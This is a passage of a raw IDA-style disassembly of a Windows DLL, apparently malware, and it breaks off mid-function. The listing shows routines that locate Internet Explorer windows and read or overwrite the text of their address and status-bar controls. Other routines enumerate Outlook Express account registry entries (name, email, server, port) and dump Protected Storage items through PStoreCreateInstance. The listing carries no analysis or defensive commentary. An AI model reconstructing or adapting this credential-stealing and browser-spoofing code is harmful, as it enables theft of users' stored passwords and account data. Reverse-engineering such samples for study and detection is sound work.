mov [ebp+var_664], 1
mov eax, [ebp+Str]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_654]
mov dword_10035D64[ecx*4], eax
mov edx, [ebp+Str]
push edx ; lpString2
mov eax, [ebp+var_654]
mov ecx, dword_10035D64[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10001BF7: ; CODE XREF: sub_100015CE+511�j
cmp [ebp+var_650], 2
jnz short loc_10001C3C
mov edx, [ebp+Str]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_654]
mov dword_100363A4[ecx*4], eax
mov edx, [ebp+Str]
push edx ; lpString2
mov eax, [ebp+var_654]
mov ecx, dword_100363A4[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10001C3C: ; CODE XREF: sub_100015CE+630�j
cmp [ebp+var_650], 3
jnz short loc_10001C81
mov edx, [ebp+Str]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_654]
mov dword_100369E4[ecx*4], eax
mov edx, [ebp+Str]
push edx ; lpString2
mov eax, [ebp+var_654]
mov ecx, dword_100369E4[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10001C81: ; CODE XREF: sub_100015CE+675�j
mov [ebp+var_674], 0FFFFFFFFh
mov edx, [ebp+var_778]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+Str]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_650], 4
loc_10001CAD: ; CODE XREF: sub_100015CE+35A�j
; sub_100015CE+485�j ...
mov [ebp+var_788], 4
loc_10001CB7: ; CODE XREF: sub_100015CE+341�j
jmp loc_100018D6
; ---------------------------------------------------------------------------
loc_10001CBC: ; CODE XREF: sub_100015CE+31E�j
mov ecx, [ebp+var_674]
add ecx, 1
mov [ebp+var_674], ecx
mov edx, [ebp+var_77C]
add edx, 1
mov [ebp+var_77C], edx
jmp loc_10001888
; ---------------------------------------------------------------------------
loc_10001CDF: ; CODE XREF: sub_100015CE+2D6�j
mov eax, [ebp+Str]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+var_66C]
mov edx, [ebp+ecx*4+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+var_654]
add eax, 1
mov [ebp+var_654], eax
jmp loc_10001801
; ---------------------------------------------------------------------------
loc_10001D17: ; CODE XREF: sub_100015CE+24E�j
mov eax, 1
loc_10001D1C: ; CODE XREF: sub_100015CE+1ED�j
mov esp, ebp
pop ebp
retn
sub_100015CE endp
; ---------------------------------------------------------------------------
off_10001D20 dd offset loc_1000193B ; DATA XREF: sub_100015CE+366�r
dd offset loc_10001A58
dd offset loc_10001A89
dd offset loc_10001ABA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10001D30(HWND hWnd, int)
sub_10001D30 proc near ; DATA XREF: .text:10001DC6�o
Str1 = byte ptr -100h
hWnd = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push 0FFh ; nMaxCount
lea eax, [ebp+Str1]
push eax ; lpClassName
mov ecx, [ebp+hWnd]
push ecx ; hWnd
call ds:GetClassNameA ; GetClassNameA
push offset Str2 ; "Internet Explorer_Server"
lea edx, [ebp+Str1]
push edx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10001D84
mov eax, dword_1002C210
push eax ; int
mov ecx, [ebp+hWnd]
push ecx ; hWnd
call sub_10003460
call sub_10003605
mov edx, [ebp+hWnd]
push edx
call sub_100034DC
loc_10001D84: ; CODE XREF: sub_10001D30+35�j
mov eax, 1
mov esp, ebp
pop ebp
retn 8
sub_10001D30 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 100h
push 0FFh
lea eax, [ebp-100h]
push eax
mov ecx, [ebp+8]
push ecx
call ds:GetClassNameA ; GetClassNameA
push offset aIeframe ; "IEFrame"
lea edx, [ebp-100h]
push edx
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_10001DD5
push 0
push offset sub_10001D30
mov eax, [ebp+8]
push eax
call ds:EnumChildWindows ; EnumChildWindows
loc_10001DD5: ; CODE XREF: .text:10001DC2�j
mov eax, 1
mov esp, ebp
pop ebp
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001DE0 proc near ; CODE XREF: .text:1000AFC5�p
hWnd = dword ptr -114h
String1 = byte ptr -110h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Point = POINT ptr -8
push ebp
mov ebp, esp
sub esp, 114h
push 0 ; nIndex
call ds:GetSystemMetrics ; GetSystemMetrics
cdq
sub eax, edx
sar eax, 1
mov [ebp+Point.x], eax
push 1 ; nIndex
call ds:GetSystemMetrics ; GetSystemMetrics
mov [ebp+var_C], eax
mov [ebp+var_10], 0
jmp short loc_10001E16
; ---------------------------------------------------------------------------
loc_10001E0D: ; CODE XREF: sub_10001DE0:loc_10001F4D�j
mov eax, [ebp+var_10]
add eax, 2
mov [ebp+var_10], eax
loc_10001E16: ; CODE XREF: sub_10001DE0+2B�j
mov ecx, [ebp+var_10]
cmp ecx, [ebp+var_C]
jge loc_10001F52
mov edx, [ebp+var_10]
mov [ebp+Point.y], edx
mov eax, [ebp+Point.y]
push eax
mov ecx, [ebp+Point.x]
push ecx ; Point
call ds:WindowFromPoint ; WindowFromPoint
mov [ebp+hWnd], eax
push 0FFh ; nMaxCount
lea edx, [ebp+String1]
push edx ; lpClassName
mov eax, [ebp+hWnd]
push eax ; hWnd
call ds:GetClassNameA ; GetClassNameA
push offset aIeframe_0 ; "IEFrame"
lea ecx, [ebp+String1]
push ecx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10001E79
mov edx, [ebp+hWnd]
mov dword_1006A96C, edx
loc_10001E79: ; CODE XREF: sub_10001DE0+8B�j
push offset String2 ; "msctls_statusbar32"
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_10001EC8
push offset String ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jz short loc_10001EC8
push offset byte_10073988 ; lpString2
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea edx, [ebp+String1]
push edx ; lParam
push 0 ; wParam
push 0Ch ; Msg
mov eax, [ebp+hWnd]
push eax ; hWnd
call ds:SendMessageA ; SendMessageA
loc_10001EC8: ; CODE XREF: sub_10001DE0+AD�j
; sub_10001DE0+BC�j
push offset aEdit ; "Edit"
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_10001F4D
push 0FFh ; Size
push 0 ; Val
lea edx, [ebp+String1]
push edx ; Dst
call memset ; memset
add esp, 0Ch
lea eax, [ebp+String1]
push eax ; lParam
push 0FFh ; wParam
push 0Dh ; Msg
mov ecx, [ebp+hWnd]
push ecx ; hWnd
call ds:SendMessageA ; SendMessageA
push offset String ; SubStr
lea edx, [ebp+String1]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10001F4D
push offset String ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jz short loc_10001F4D
push offset dword_100663D8 ; lParam
push 0 ; wParam
push 0Ch ; Msg
mov eax, [ebp+hWnd]
push eax ; hWnd
call ds:SendMessageA ; SendMessageA
loc_10001F4D: ; CODE XREF: sub_10001DE0+FC�j
; sub_10001DE0+146�j ...
jmp loc_10001E0D
; ---------------------------------------------------------------------------
loc_10001F52: ; CODE XREF: sub_10001DE0+3C�j
mov eax, 1
mov esp, ebp
pop ebp
retn
sub_10001DE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10001F5B(HWND hWnd, int)
sub_10001F5B proc near ; DATA XREF: .text:1000209B�o
lParam = byte ptr -100h
hWnd = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push 0FFh ; nMaxCount
lea eax, [ebp+lParam]
push eax ; lpClassName
mov ecx, [ebp+hWnd]
push ecx ; hWnd
call ds:GetClassNameA ; GetClassNameA
push offset aMsctls_statu_0 ; "msctls_statusbar32"
lea edx, [ebp+lParam]
push edx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10001FCC
push offset String ; Str
call strlen ; strlen
add esp, 4
test eax, eax
jz short loc_10001FCC
push offset Source ; Source
lea eax, [ebp+lParam]
push eax ; Dest
call strcpy ; strcpy
add esp, 8
lea ecx, [ebp+lParam]
push ecx ; lParam
push 0 ; wParam
push 0Ch ; Msg
mov edx, [ebp+hWnd]
push edx ; hWnd
call ds:SendMessageA ; SendMessageA
loc_10001FCC: ; CODE XREF: sub_10001F5B+35�j
; sub_10001F5B+46�j
push offset aEdit_0 ; "Edit"
lea eax, [ebp+lParam]
push eax ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000204F
push 0FFh ; Size
push 0 ; Val
lea ecx, [ebp+lParam]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
lea edx, [ebp+lParam]
push edx ; lParam
push 0FFh ; wParam
push 0Dh ; Msg
mov eax, [ebp+hWnd]
push eax ; hWnd
call ds:SendMessageA ; SendMessageA
lea ecx, [ebp+lParam]
push ecx ; SubStr
push offset String ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000204F
push offset String ; Str
call strlen ; strlen
add esp, 4
test eax, eax
jz short loc_1000204F
push offset dword_100663D8 ; lParam
push 0 ; wParam
push 0Ch ; Msg
mov edx, [ebp+hWnd]
push edx ; hWnd
call ds:SendMessageA ; SendMessageA
loc_1000204F: ; CODE XREF: sub_10001F5B+87�j
; sub_10001F5B+CE�j ...
mov eax, 1
mov esp, ebp
pop ebp
retn 8
sub_10001F5B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 100h
push 0FFh
lea eax, [ebp-100h]
push eax
mov ecx, [ebp+8]
push ecx
call ds:GetClassNameA ; GetClassNameA
push offset aIeframe_1 ; "IEFrame"
lea edx, [ebp-100h]
push edx
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_100020AA
mov eax, [ebp+8]
mov dword_1006A96C, eax
push 0
push offset sub_10001F5B
mov ecx, [ebp+8]
push ecx
call ds:EnumChildWindows ; EnumChildWindows
loc_100020AA: ; CODE XREF: .text:1000208F�j
mov eax, 1
mov esp, ebp
pop ebp
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100020B5(LPSTR Dest)
sub_100020B5 proc near ; CODE XREF: sub_1000B7EF+8F9�p
var_5AC = dword ptr -5ACh
var_5A8 = dword ptr -5A8h
var_5A4 = dword ptr -5A4h
var_5A0 = dword ptr -5A0h
var_59C = dword ptr -59Ch
var_598 = dword ptr -598h
var_594 = dword ptr -594h
var_590 = byte ptr -590h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = byte ptr -584h
var_580 = byte ptr -580h
var_570 = dword ptr -570h
dwIndex = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
cchName = dword ptr -55Ch
phkResult = dword ptr -558h
SubKey = byte ptr -554h
cbData = dword ptr -450h
var_44C = dword ptr -44Ch
hModule = dword ptr -448h
var_444 = dword ptr -444h
Type = dword ptr -440h
ValueName = byte ptr -43Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
var_330 = byte ptr -330h
hKey = dword ptr -32Ch
Source = byte ptr -328h
Data = byte ptr -128h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
cchValueName = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_100020B5
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 5A0h
lea eax, [ebp+hKey]
push eax ; phkResult
push 0F003Fh ; samDesired
push 0 ; ulOptions
push offset SubKey ; "SOFTWARE\\Microsoft\\Internet Account Man"...
push 80000001h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jnz loc_10002407
mov [ebp+var_564], 0
mov [ebp+var_568], 0
mov [ebp+var_560], 0
mov [ebp+dwIndex], 0
mov [ebp+var_570], 0
loc_10002130: ; CODE XREF: sub_100020B5+34D�j
cmp [ebp+var_564], 0
jz short loc_10002149
cmp [ebp+var_564], 0EAh
jnz loc_10002407
loc_10002149: ; CODE XREF: sub_100020B5+82�j
mov [ebp+cchName], 104h
push 0 ; lpftLastWriteTime
push 0 ; lpcchClass
push 0 ; lpClass
push 0 ; lpReserved
lea ecx, [ebp+cchName]
push ecx ; lpcchName
lea edx, [ebp+SubKey]
push edx ; lpName
mov eax, [ebp+dwIndex]
push eax ; dwIndex
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegEnumKeyExA ; RegEnumKeyExA
mov [ebp+var_564], eax
lea edx, [ebp+phkResult]
push edx ; phkResult
push 0F003Fh ; samDesired
push 0 ; ulOptions
lea eax, [ebp+SubKey]
push eax ; lpSubKey
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
mov edx, [ebp+dwIndex]
add edx, 1
mov [ebp+dwIndex], edx
mov [ebp+var_570], 0
mov [ebp+var_568], 0
loc_100021C8: ; CODE XREF: sub_100020B5:loc_100023F0�j
cmp [ebp+var_568], 103h
jz loc_100023F5
cmp [ebp+var_564], 0
jz short loc_100021F1
cmp [ebp+var_564], 0EAh
jnz loc_100023F5
loc_100021F1: ; CODE XREF: sub_100020B5+12A�j
mov [ebp+cbData], 104h
mov [ebp+cchValueName], 104h
push 0 ; lpcbData
push 0 ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push 0 ; lpReserved
lea ecx, [ebp+cchValueName]
push ecx ; lpcchValueName
lea edx, [ebp+ValueName]
push edx ; lpValueName
mov eax, [ebp+var_570]
push eax ; dwIndex
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegEnumValueA ; RegEnumValueA
mov [ebp+var_568], eax
mov edx, [ebp+var_570]
add edx, 1
mov [ebp+var_570], edx
cmp [ebp+var_568], 103h
jz loc_100023F0
cmp [ebp+var_570], 1
jnz short loc_1000226B
push offset aOutlookExpress ; "----------Outlook Express record-------"...
mov eax, [ebp+Dest]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000226B: ; CODE XREF: sub_100020B5+1A5�j
cmp [ebp+Type], 1
jnz loc_1000230F
mov [ebp+cbData], 104h
lea ecx, [ebp+cbData]
push ecx ; lpcbData
lea edx, [ebp+Data]
push edx ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push 0 ; lpReserved
lea ecx, [ebp+ValueName]
push ecx ; lpValueName
mov edx, [ebp+phkResult]
push edx ; hKey
call ds:RegQueryValueExA ; RegQueryValueExA
mov eax, [ebp+cbData]
push eax
lea ecx, [ebp+Data]
push ecx
call sub_100013FE
add esp, 8
test eax, eax
jz short loc_100022EC
lea edx, [ebp+Data]
push edx
lea eax, [ebp+ValueName]
push eax
push offset Format ; "%s = %ws\n"
lea ecx, [ebp+Source]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
jmp short loc_1000230F
; ---------------------------------------------------------------------------
loc_100022EC: ; CODE XREF: sub_100020B5+210�j
lea edx, [ebp+Data]
push edx
lea eax, [ebp+ValueName]
push eax
push offset aSS ; "%s = %s\n"
lea ecx, [ebp+Source]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
loc_1000230F: ; CODE XREF: sub_100020B5+1BD�j
; sub_100020B5+235�j
cmp [ebp+Type], 4
jz short loc_10002321
cmp [ebp+Type], 3
jnz short loc_10002379
loc_10002321: ; CODE XREF: sub_100020B5+261�j
mov [ebp+cbData], 4
lea edx, [ebp+cbData]
push edx ; lpcbData
lea eax, [ebp+var_444]
push eax ; lpData
lea ecx, [ebp+Type]
push ecx ; lpType
push 0 ; lpReserved
lea edx, [ebp+ValueName]
push edx ; lpValueName
mov eax, [ebp+phkResult]
push eax ; hKey
call ds:RegQueryValueExA ; RegQueryValueExA
mov ecx, [ebp+var_444]
push ecx
lea edx, [ebp+ValueName]
push edx
push offset aSD ; "%s = %d\n"
lea eax, [ebp+Source]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 10h
loc_10002379: ; CODE XREF: sub_100020B5+26A�j
push offset aName ; "Name"
lea ecx, [ebp+Source]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_100023DD
push offset aEmail ; "Email"
lea edx, [ebp+Source]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_100023DD
push offset aServer ; "Server"
lea eax, [ebp+Source]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_100023DD
push offset aPort ; "Port"
lea ecx, [ebp+Source]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_100023F0
loc_100023DD: ; CODE XREF: sub_100020B5+2DB�j
; sub_100020B5+2F4�j ...
lea edx, [ebp+Source]
push edx ; Source
mov eax, [ebp+Dest]
push eax ; Dest
call strcat ; strcat
add esp, 8
loc_100023F0: ; CODE XREF: sub_100020B5+198�j
; sub_100020B5+326�j
jmp loc_100021C8
; ---------------------------------------------------------------------------
loc_100023F5: ; CODE XREF: sub_100020B5+11D�j
; sub_100020B5+136�j
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
jmp loc_10002130
; ---------------------------------------------------------------------------
loc_10002407: ; CODE XREF: sub_100020B5+43�j
; sub_100020B5+8E�j
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
push offset aPsItem ; "---------------PS item------------\n"
mov eax, [ebp+Dest]
push eax ; Dest
call strcat ; strcat
add esp, 8
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022084
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpLibFileName
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+hModule], eax
push offset ProcName ; "PStoreCreateInstance"
mov eax, [ebp+hModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov [ebp+var_338], eax
lea ecx, [ebp+var_334]
call ??0_Container_base@std@@QAE@XZ_1 ; std::_Container_base::_Container_base(void)
mov [ebp+var_4], 0
push 0
push 0
push 0
lea ecx, [ebp+var_334]
call sub_1000E1F0
push eax
call [ebp+var_338]
mov [ebp+var_44C], eax
lea ecx, [ebp+var_330]
call ??0_Container_base@std@@QAE@XZ_1 ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_330]
call sub_1000E1F0
push eax
push 0
push 0
lea ecx, [ebp+var_334]
call sub_1000E130
mov ecx, eax
call sub_1000CF90
mov [ebp+var_44C], eax
loc_100024CC: ; CODE XREF: sub_100020B5+652�j
push 0
lea ecx, [ebp+var_20]
push ecx
push 1
lea ecx, [ebp+var_330]
call sub_1000E130
mov [ebp+var_5A4], eax
mov edx, [ebp+var_5A4]
mov eax, [edx]
mov ecx, [ebp+var_5A4]
push ecx
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_1000270C
lea ecx, [ebp+var_584]
call ??0_Container_base@std@@QAE@XZ_1 ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_584]
call sub_1000E1F0
push eax
push 0
lea edx, [ebp+var_20]
push edx
push 0
lea ecx, [ebp+var_334]
call sub_1000E130
mov ecx, eax
call sub_1000CFE0
mov [ebp+var_44C], eax
loc_1000253A: ; CODE XREF: sub_100020B5+63E�j
push 0
lea eax, [ebp+var_580]
push eax
push 1
lea ecx, [ebp+var_584]
call sub_1000E130
mov [ebp+var_5A8], eax
mov ecx, [ebp+var_5A8]
mov edx, [ecx]
mov eax, [ebp+var_5A8]
push eax
call dword ptr [edx+0Ch]
test eax, eax
jnz loc_100026F8
lea ecx, [ebp+var_590]
call ??0_Container_base@std@@QAE@XZ_1 ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_590]
call sub_1000E1F0
push eax
push 0
lea ecx, [ebp+var_580]
push ecx
lea edx, [ebp+var_20]
push edx
push 0
lea ecx, [ebp+var_334]
call sub_1000E130
mov ecx, eax
call sub_1000D090
mov [ebp+var_58C], eax
loc_100025B2: ; CODE XREF: sub_100020B5+62A�j
push 0
lea eax, [ebp+var_588]
push eax
push 1
lea ecx, [ebp+var_590]
call sub_1000E130
mov [ebp+var_5AC], eax
mov ecx, [ebp+var_5AC]
mov edx, [ecx]
mov eax, [ebp+var_5AC]
push eax
call dword ptr [edx+0Ch]
test eax, eax
jnz loc_100026E4
mov ecx, [ebp+var_588]
push ecx
push offset aItemnameWs ; "itemName = %ws\n"
lea edx, [ebp+Source]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
lea eax, [ebp+Source]
push eax ; Source
mov ecx, [ebp+Dest]
push ecx ; Dest
call strcat ; strcat
add esp, 8
mov [ebp+var_598], 0
mov [ebp+var_59C], 0
mov [ebp+var_594], 0
push 0
mov edx, [ebp+var_594]
push edx
lea eax, [ebp+var_59C]
push eax
lea ecx, [ebp+var_598]
push ecx
mov edx, [ebp+var_588]
push edx
lea eax, [ebp+var_580]
push eax
lea ecx, [ebp+var_20]
push ecx
push 0
lea ecx, [ebp+var_334]
call sub_1000E130
mov ecx, eax
call sub_1000D030
mov [ebp+var_58C], eax
mov edx, [ebp+var_598]
push edx
mov eax, [ebp+var_59C]
push eax
call sub_100013FE
add esp, 8
test eax, eax
jz short loc_100026B0
mov ecx, [ebp+var_59C]
push ecx
push offset aItemdataWs ; "itemData = %ws\n"
lea edx, [ebp+Source]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
jmp short loc_100026CC
; ---------------------------------------------------------------------------
loc_100026B0: ; CODE XREF: sub_100020B5+5DB�j
mov eax, [ebp+var_59C]
push eax
push offset aItemdataS ; "itemData = %s\n"
lea ecx, [ebp+Source]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
loc_100026CC: ; CODE XREF: sub_100020B5+5F9�j
lea edx, [ebp+Source]
push edx ; Source
mov eax, [ebp+Dest]
push eax ; Dest
call strcat ; strcat
add esp, 8
jmp loc_100025B2
; ---------------------------------------------------------------------------
loc_100026E4: ; CODE XREF: sub_100020B5+52D�j
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_590]
call sub_1000E1D0
jmp loc_1000253A
; ---------------------------------------------------------------------------
loc_100026F8: ; CODE XREF: sub_100020B5+4B5�j
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_584]
call sub_1000E1D0
jmp loc_100024CC
; ---------------------------------------------------------------------------
loc_1000270C: ; CODE XREF: sub_100020B5+444�j
mov ecx, [ebp+Dest]
mov [ebp+var_5A0], ecx
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_330]
call sub_1000E1D0
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_334]
call sub_1000E1D0
mov eax, [ebp+var_5A0]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_100020B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000274A(void *Dst, int, int)
sub_1000274A proc near ; CODE XREF: .text:10005B22�p
; StartAddress+180�p ...
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_8]
add eax, 1
push eax ; Size
push 0 ; Val
mov ecx, [ebp+Dst]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_4], 0
jmp short loc_10002775
; ---------------------------------------------------------------------------
loc_1000276C: ; CODE XREF: sub_1000274A+4F�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_10002775: ; CODE XREF: sub_1000274A+20�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jge short loc_1000279B
call ds:rand ; rand
cdq
mov ecx, 3A8h
idiv ecx
mov edx, [ebp+Dst]
add edx, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov al, [ecx+eax]
mov [edx], al
jmp short loc_1000276C
; ---------------------------------------------------------------------------
loc_1000279B: ; CODE XREF: sub_1000274A+31�j
mov esp, ebp
pop ebp
retn
sub_1000274A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000279F(wchar_t *Str2, int)
sub_1000279F proc near ; CODE XREF: TimerFunc+113�p
var_10 = dword ptr -10h
hMem = dword ptr -0Ch
var_8 = dword ptr -8
uBytes = dword ptr -4
Str2 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], 0
mov [ebp+uBytes], 0
lea eax, [ebp+uBytes]
push eax
lea ecx, [ebp+var_10]
push ecx
call sub_1000D0E0
add esp, 8
cmp [ebp+uBytes], 0
jnz short loc_100027D1
or eax, 0FFFFFFFFh
jmp loc_1000287D
; ---------------------------------------------------------------------------
loc_100027D1: ; CODE XREF: sub_1000279F+28�j
mov edx, [ebp+uBytes]
push edx ; uBytes
push 40h ; uFlags
call ds:LocalAlloc ; LocalAlloc
mov [ebp+hMem], eax
cmp [ebp+hMem], 0
jnz short loc_100027EE
or eax, 0FFFFFFFFh
jmp loc_1000287D
; ---------------------------------------------------------------------------
loc_100027EE: ; CODE XREF: sub_1000279F+45�j
mov eax, [ebp+hMem]
push eax
mov ecx, [ebp+uBytes]
push ecx
mov edx, [ebp+var_10]
push edx
call sub_1000D100
add esp, 0Ch
mov [ebp+var_8], 0
jmp short loc_10002814
; ---------------------------------------------------------------------------
loc_1000280B: ; CODE XREF: sub_1000279F:loc_1000286E�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_10002814: ; CODE XREF: sub_1000279F+6A�j
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_10]
jnb short loc_10002870
mov edx, [ebp+Str2]
push edx ; Str2
mov eax, [ebp+var_8]
imul eax, 4Ch
mov ecx, [ebp+hMem]
mov edx, [ecx+eax+30h]
push edx ; Str1
call ds:wcscmp ; wcscmp
add esp, 8
test eax, eax
jnz short loc_1000286E
mov eax, [ebp+var_8]
imul eax, 4Ch
mov ecx, [ebp+hMem]
add ecx, eax
mov edx, [ebp+arg_4]
mov eax, [ecx]
mov [edx], eax
mov eax, [ecx+4]
mov [edx+4], eax
mov eax, [ecx+8]
mov [edx+8], eax
mov ecx, [ecx+0Ch]
mov [edx+0Ch], ecx
mov edx, [ebp+hMem]
push edx ; hMem
call ds:LocalFree ; LocalFree
mov eax, [ebp+var_8]
jmp short loc_1000287D
; ---------------------------------------------------------------------------
loc_1000286E: ; CODE XREF: sub_1000279F+9A�j
jmp short loc_1000280B
; ---------------------------------------------------------------------------
loc_10002870: ; CODE XREF: sub_1000279F+7B�j
mov eax, [ebp+hMem]
push eax ; hMem
call ds:LocalFree ; LocalFree
or eax, 0FFFFFFFFh
loc_1000287D: ; CODE XREF: sub_1000279F+2D�j
; sub_1000279F+4A�j ...
mov esp, ebp
pop ebp
retn
sub_1000279F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10002881(char *Str)
sub_10002881 proc near ; CODE XREF: sub_10002C3D+255�p
; sub_100055F0+111�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_8], offset a0123456789abcd ; "0123456789abcdef"
mov [ebp+var_4], 0
mov [ebp+var_14], 1
mov eax, [ebp+Str]
push eax ; Str
call strlen ; strlen
add esp, 4
sub eax, 1
mov [ebp+var_C], eax
jmp short loc_100028B9
; ---------------------------------------------------------------------------
loc_100028B0: ; CODE XREF: sub_10002881+93�j
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_C], ecx
loc_100028B9: ; CODE XREF: sub_10002881+2D�j
cmp [ebp+var_C], 0
jl short loc_10002916
mov [ebp+var_10], 0
jmp short loc_100028D1
; ---------------------------------------------------------------------------
loc_100028C8: ; CODE XREF: sub_10002881:loc_100028FA�j
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
loc_100028D1: ; CODE XREF: sub_10002881+45�j
mov eax, [ebp+var_8]
push eax ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_10], eax
ja short loc_100028FC
mov ecx, [ebp+Str]
add ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
mov eax, [ebp+var_8]
add eax, [ebp+var_10]
movsx ecx, byte ptr [eax]
cmp edx, ecx
jnz short loc_100028FA
jmp short loc_100028FC
; ---------------------------------------------------------------------------
loc_100028FA: ; CODE XREF: sub_10002881+75�j
jmp short loc_100028C8
; ---------------------------------------------------------------------------
loc_100028FC: ; CODE XREF: sub_10002881+5F�j
; sub_10002881+77�j
mov edx, [ebp+var_10]
imul edx, [ebp+var_14]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_14]
